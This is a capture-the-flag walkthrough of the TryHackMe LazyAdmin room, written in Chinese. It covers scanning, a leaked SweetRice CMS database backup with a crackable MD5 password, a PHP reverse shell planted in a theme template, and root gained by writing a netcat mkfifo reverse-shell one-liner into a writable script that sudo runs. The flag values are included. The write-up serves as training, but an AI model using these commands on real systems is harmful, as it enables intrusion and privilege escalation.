关于安全:TryhackmeLazyAdmin敏感信息泄露sudo执行敏感文件提权

48次阅读

共计 5100 个字符,预计需要花费 13 分钟才能阅读完成。

服务发现

┌──(root💀kali)-[~/tryhackme/LazyAdminFinal]
└─# nmap -sV -Pn 10.10.113.182 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-09-23 22:02 EDT
Nmap scan report for 10.10.113.182
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds

目录爆破

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -u http://10.10.113.182 -e* -t 100                                                                                                                                                                           130 ⨯

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_|)

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100

Error Log: /root/dirsearch/logs/errors-21-09-23_22-07-17.log

Target: http://10.10.113.182

[22:07:18] Starting: 
[22:07:39] 301 -  316B  - /content  ->  http://10.10.113.182/content/                                             
[22:07:42] 200 -   11KB - /index.html                                                                          

只有一个 content 目录,关上是一个SweetRicecms 介绍页,持续爆破 content 目录

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -u http://10.10.113.182/content -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-lowercase-2.3-medium.txt

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_|)

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 207627

Error Log: /root/dirsearch/logs/errors-21-09-23_22-58-30.log

Target: http://10.10.113.182/content

[22:58:30] Starting: 
[22:58:31] 200 -    2KB - /content/
[22:58:34] 301 -  323B  - /content/images  ->  http://10.10.113.182/content/images/
[22:58:40] 301 -  319B  - /content/js  ->  http://10.10.113.182/content/js/
[22:58:44] 301 -  320B  - /content/inc  ->  http://10.10.113.182/content/inc/
[22:58:47] 301 -  319B  - /content/as  ->  http://10.10.113.182/content/as/
[22:58:48] 301 -  324B  - /content/_themes  ->  http://10.10.113.182/content/_themes/
[22:58:49] 301 -  327B  - /content/attachment  ->  http://10.10.113.182/content/attachment/

http://10.10.113.182/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql 找到备份的 mysql 语句,裸露了 cms 表名,一个登录凭证

用户名:manager
明码:42f749ade7f9e195bf475f37a44cafcb

md5 明码破解进去是:Password123

http://10.10.113.182/content/as/是登陆页面

/content/license.txt/inc/lastest.txt验证 cms 的版本号是 1.5.1,在 kali 搜寻这个版本号的 cms 破绽

┌──(root💀kali)-[~]
└─# searchsploit SweetRice 1.5.1
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
SweetRice 1.5.1 - Arbitrary File Download                                                                                                                                                                 | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload                                                                                                                                                                   | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure                                                                                                                                                                       | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery                                                                                                                                                              | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                                                                                                                                         | php/webapps/40700.html
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

上传脚本须要一个登录凭证,应用下面找到的manager:Password123,应用 40716.py 攻打脚本,然而貌似上传不了文件

登录后盾,在 Theme, 抉择 Footer section template,间接编辑 php 源码写反弹 shell,拜访 http://10.10.113.182/content/_themes/default/foot.php 胜利反弹到 shell,拿到 user.txt

┌──(root💀kali)-[~/tryhackme/LazyAdminFinal]
└─# nc -lnvp 1234                                      
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.113.182] 46142
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 06:50:08 up  1:48,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home
$ ls
itguy
$ cd itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
THM{63e5bce9271952aad1113b6f1ac28a07}

在同目录有一个 backup.pl 文件,源码内容是执行一个 copy.sh 文件
而 copy.sh 是能够编辑的
两个文件所有者是 root,如果能够以 root 的身份执行一个 /etc/copy.sh 批处理文件,咱们就能够应用该 sh 文件来晋升到 root

$ cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f
$ ls -alh /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh

写 shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f" > /etc/copy.sh

切换 tty, 查看 sudo -l,www-data 正好能够用 root 权限执行 /home/itguy/backup.pl

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl

与此同时另起一个端口监听,拿到 root 反弹 shell 和 root.txt

┌──(root💀kali)-[~]
└─# nc -lnvp 4242                                                                                                                                                                                                                       1 ⨯
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.113.182] 33518
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{6637f41d0177b6f37cb20d775124699f}

正文完
 0